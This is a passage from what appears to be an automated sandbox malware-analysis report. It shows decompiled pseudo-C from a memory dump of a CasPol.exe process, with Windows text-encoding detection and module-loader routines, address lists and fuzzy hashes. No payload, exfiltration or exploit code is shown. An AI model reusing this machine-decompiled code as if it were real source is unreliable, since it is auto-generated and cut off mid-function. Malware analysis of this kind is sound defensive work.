									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x14a6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x14a6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x14a6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x13b1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M013B1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                                                        0x013b0d2b
                                                                        0x013b0d2e
                                                                        0x013b0d32
                                                                        0x013b0d39
                                                                        0x013b0d3b
                                                                        0x013b0d3d
                                                                        0x013b0d3f
                                                                        0x013b0d46
                                                                        0x013b0d4d
                                                                        0x013b0d54
                                                                        0x013b0d5b
                                                                        0x013b0d62
                                                                        0x013b0d69
                                                                        0x013b0d70
                                                                        0x013b0d77
                                                                        0x013b0d7e
                                                                        0x013b0d85
                                                                        0x013b0d88
                                                                        0x013b0d8b
                                                                        0x013b0d8e
                                                                        0x013b0d91
                                                                        0x013b0d94
                                                                        0x013b0d97
                                                                        0x013b0d9a
                                                                        0x013b0d9d
                                                                        0x013b0da6
                                                                        0x013b10e9
                                                                        0x013b10ee
                                                                        0x013b0db9
                                                                        0x013b0db9
                                                                        0x013b0dbc
                                                                        0x0140e9c7
                                                                        0x0140e9ca
                                                                        0x0140e9cd
                                                                        0x0140e9d0
                                                                        0x0140e9dd
                                                                        0x0140e9dd
                                                                        0x013b0dec
                                                                        0x013b0dec
                                                                        0x013b0dee
                                                                        0x013b0df3
                                                                        0x013b0ebf
                                                                        0x013b0ec0
                                                                        0x00000000
                                                                        0x013b0df9
                                                                        0x013b0df9
                                                                        0x013b0e1e
                                                                        0x013b0e21
                                                                        0x013b0e24
                                                                        0x013b0e27
                                                                        0x013b0e2a
                                                                        0x013b0e2d
                                                                        0x013b0e30
                                                                        0x013b0e36
                                                                        0x013b1040
                                                                        0x013b1043
                                                                        0x013b1049
                                                                        0x013b1049
                                                                        0x013b0e3c
                                                                        0x013b0e3f
                                                                        0x013b1007
                                                                        0x013b100a
                                                                        0x013b1010
                                                                        0x013b1010
                                                                        0x013b100a
                                                                        0x013b0e3f
                                                                        0x013b0e58
                                                                        0x013b0e5d
                                                                        0x013b1000
                                                                        0x013b0e63
                                                                        0x013b0e63
                                                                        0x013b0e63
                                                                        0x013b0e67
                                                                        0x013b0e69
                                                                        0x013b0e69
                                                                        0x013b0e6d
                                                                        0x013b0e70
                                                                        0x013b0e74
                                                                        0x013b0e76
                                                                        0x013b0e76
                                                                        0x013b0e7a
                                                                        0x013b0e7c
                                                                        0x013b0e7c
                                                                        0x013b0e83
                                                                        0x013b0e86
                                                                        0x013b0e87
                                                                        0x013b0e89
                                                                        0x013b0e8b
                                                                        0x013b0e91
                                                                        0x013b0e00
                                                                        0x013b0e03
                                                                        0x013b0e03
                                                                        0x013b0e07
                                                                        0x013b0e0f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0e0f
                                                                        0x013b0e97
                                                                        0x013b0e9c
                                                                        0x013b113e
                                                                        0x013b1141
                                                                        0x013b1143
                                                                        0x013b0eb1
                                                                        0x013b0eb1
                                                                        0x013b0eb4
                                                                        0x013b0eb6
                                                                        0x013b1110
                                                                        0x013b1112
                                                                        0x0140ea25
                                                                        0x0140ea25
                                                                        0x013b0ec3
                                                                        0x013b0ec3
                                                                        0x013b0ecb
                                                                        0x013b10fe
                                                                        0x013b0ed1
                                                                        0x013b0ed1
                                                                        0x013b0ed1
                                                                        0x013b0ed3
                                                                        0x013b0edb
                                                                        0x0140ea2d
                                                                        0x0140ea2f
                                                                        0x0140ea31
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140ea37
                                                                        0x0140ea37
                                                                        0x0140ea3a
                                                                        0x0140ea3e
                                                                        0x0140ea47
                                                                        0x0140ea4a
                                                                        0x0140ea4c
                                                                        0x0140ea4d
                                                                        0x0140ea4d
                                                                        0x0140ea4e
                                                                        0x0140ea4e
                                                                        0x0140ea51
                                                                        0x0140ea52
                                                                        0x0140ea52
                                                                        0x00000000
                                                                        0x013b0ee1
                                                                        0x013b0ee1
                                                                        0x013b0ee1
                                                                        0x013b0ee3
                                                                        0x013b0ee3
                                                                        0x013b0ee6
                                                                        0x013b0eec
                                                                        0x0140ea5b
                                                                        0x0140ea5d
                                                                        0x013b0ef6
                                                                        0x013b0ef8
                                                                        0x0140ea6f
                                                                        0x0140ea6f
                                                                        0x013b0efe
                                                                        0x013b0efe
                                                                        0x013b0f03
                                                                        0x0140ea7b
                                                                        0x0140ea7d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140ea83
                                                                        0x0140ea85
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140ea8b
                                                                        0x0140ea91
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140ea97
                                                                        0x0140ea9a
                                                                        0x0140eaa0
                                                                        0x0140eaa2
                                                                        0x0140eaa2
                                                                        0x0140eaae
                                                                        0x0140eab3
                                                                        0x0140eab6
                                                                        0x0140eabf
                                                                        0x0140eaca
                                                                        0x0140eacd
                                                                        0x0140ead1
                                                                        0x0140ead1
                                                                        0x0140eab8
                                                                        0x0140eab8
                                                                        0x0140eab8
                                                                        0x0140ead2
                                                                        0x0140ead9
                                                                        0x013b0f0e
                                                                        0x013b0f15
                                                                        0x013b0f17
                                                                        0x013b0f17
                                                                        0x013b0f1e
                                                                        0x013b0f23
                                                                        0x0140eae1
                                                                        0x0140eae1
                                                                        0x013b0f38
                                                                        0x013b0f3a
                                                                        0x013b0f3a
                                                                        0x013b0f49
                                                                        0x013b1108
                                                                        0x013b1108
                                                                        0x013b0f5b
                                                                        0x013b10c7
                                                                        0x013b10ca
                                                                        0x013b10cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b10dc
                                                                        0x013b10de
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0f61
                                                                        0x013b0f61
                                                                        0x013b0f61
                                                                        0x013b0f67
                                                                        0x013b0f6b
                                                                        0x013b111d
                                                                        0x013b111d
                                                                        0x013b0f75
                                                                        0x013b0f77
                                                                        0x013b0f77
                                                                        0x013b0f85
                                                                        0x013b0f8b
                                                                        0x013b10b9
                                                                        0x013b10bc
                                                                        0x0140eae9
                                                                        0x0140eae9
                                                                        0x013b0f91
                                                                        0x013b0f91
                                                                        0x013b0f91
                                                                        0x013b0f96
                                                                        0x013b0f98
                                                                        0x013b0f9a
                                                                        0x013b0f9a
                                                                        0x013b0fa6
                                                                        0x013b107c
                                                                        0x013b107f
                                                                        0x013b108d
                                                                        0x00000000
                                                                        0x013b108d
                                                                        0x013b1081
                                                                        0x013b1087
                                                                        0x0140eaf4
                                                                        0x0140eafa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140eb00
                                                                        0x00000000
                                                                        0x013b0fac
                                                                        0x013b0fac
                                                                        0x00000000
                                                                        0x013b0fac
                                                                        0x013b0fa6
                                                                        0x013b0f5b
                                                                        0x013b0f09
                                                                        0x013b0f09
                                                                        0x00000000
                                                                        0x013b0f09
                                                                        0x0140ea63
                                                                        0x00000000
                                                                        0x0140ea63
                                                                        0x013b0ef4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0ef4
                                                                        0x013b0ebc
                                                                        0x013b0ebc
                                                                        0x00000000
                                                                        0x013b0ebc
                                                                        0x013b0eb6
                                                                        0x013b1149
                                                                        0x013b114c
                                                                        0x013b114d
                                                                        0x00000000
                                                                        0x013b114d
                                                                        0x013b0ea4
                                                                        0x013b0ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0fb7
                                                                        0x013b0fb7
                                                                        0x013b0fbc
                                                                        0x013b0fc9
                                                                        0x013b0fc9
                                                                        0x013b0fce
                                                                        0x013b1020
                                                                        0x013b1025
                                                                        0x013b1094
                                                                        0x013b1094
                                                                        0x013b1099
                                                                        0x0140ea04
                                                                        0x0140ea04
                                                                        0x0140ea09
                                                                        0x0140ea1c
                                                                        0x0140ea0b
                                                                        0x0140ea0b
                                                                        0x0140ea0e
                                                                        0x0140ea14
                                                                        0x0140ea14
                                                                        0x0140ea0e
                                                                        0x0140ea09
                                                                        0x013b1027
                                                                        0x013b1027
                                                                        0x013b1155
                                                                        0x013b102d
                                                                        0x013b102d
                                                                        0x013b102d
                                                                        0x013b1032
                                                                        0x0140e9fc
                                                                        0x0140e9fc
                                                                        0x013b1032
                                                                        0x013b1027
                                                                        0x00000000
                                                                        0x013b1025
                                                                        0x013b0fd0
                                                                        0x0140e9f4
                                                                        0x00000000
                                                                        0x0140e9f4
                                                                        0x013b0fd6
                                                                        0x013b0fd9
                                                                        0x013b1059
                                                                        0x013b1059
                                                                        0x013b105e
                                                                        0x0140e9ec
                                                                        0x013b1064
                                                                        0x013b1064
                                                                        0x013b1064
                                                                        0x013b1069
                                                                        0x013b10ac
                                                                        0x013b106b
                                                                        0x013b106b
                                                                        0x013b106e
                                                                        0x013b1074
                                                                        0x013b1074
                                                                        0x013b106e
                                                                        0x013b1069
                                                                        0x00000000
                                                                        0x013b105e
                                                                        0x013b0fdb
                                                                        0x013b10a4
                                                                        0x00000000
                                                                        0x013b10a4
                                                                        0x013b0fe1
                                                                        0x013b0fe4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0fea
                                                                        0x013b0ff1
                                                                        0x00000000
                                                                        0x013b0ff8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0140e9e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b1018
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b1051
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0ff1
                                                                        0x013b0fbe
                                                                        0x013b0fc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b0fc3
                                                                        0x013b0df3
                                                                        0x0140e9d5
                                                                        0x0140e9d7
                                                                        0x013b1128
                                                                        0x013b1128
                                                                        0x013b112b
                                                                        0x013b112d
                                                                        0x013b1133
                                                                        0x013b1133
                                                                        0x00000000
                                                                        0x013b112d
                                                                        0x00000000
                                                                        0x0140e9d7
                                                                        0x013b0dc2
                                                                        0x013b10f6
                                                                        0x013b0dd4
                                                                        0x013b0dd7
                                                                        0x013b0dda
                                                                        0x013b0de8
                                                                        0x013b0de9
                                                                        0x013b0de9
                                                                        0x013b0dda
                                                                        0x00000000
                                                                        0x013b0dc2
                                                                        0x013b0dac
                                                                        0x013b0dae
                                                                        0x013b0db3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81236736df79b49c0fac7396994a04cc7094cf61713c3a9644d36b5d82f658b0
                                                                        • Instruction ID: 7721cbc5ad9ee895c63304aa5a701783b92da019dc41f9aea93c2f8fdd689205
                                                                        • Opcode Fuzzy Hash: 81236736df79b49c0fac7396994a04cc7094cf61713c3a9644d36b5d82f658b0
                                                                        • Instruction Fuzzy Hash: A9D1AD31E0464D8BEB2D8E9DD5D03FEBBB5EB44308F14802AE746A7A95E7748985CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013CD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E013CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x14ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E013C6600(0x14a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x14a7b9c; // 0x0
							_t281 = L013D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E013FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x14a7b90; // 0x77d00000
								if(_t384 == 0) {
									_t353 =  *0x14a7b8c; // 0xf52a78
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E013D2280(_t200, 0x14a84d8);
									_t277 =  *0x14a85f4; // 0xf52f68
									_t351 =  *0x14a85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xf52f00
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E013CFFB0(_t287, _t353, 0x14a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0140CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E013C6600(0x14a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E013C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x14ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0143E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x14a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x14ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x14ab218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E013D2280(_t250, 0x14a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L013F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E013CFFB0(_t293, _t353, 0x14a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E013F37F5(_t353, 0);
																}
																E013F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E013E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E013E02D6(_t174);
																}
																L013D77F0( *0x14a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E013EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L013CEC7F(_t353);
										L013E19B8(_t287, 0, _t353, 0);
										_t200 = E013BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x14ab2f8 |  *0x14ab2fc) == 0 || ( *0x14ab2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E013FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x14ab2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01466B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01466AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
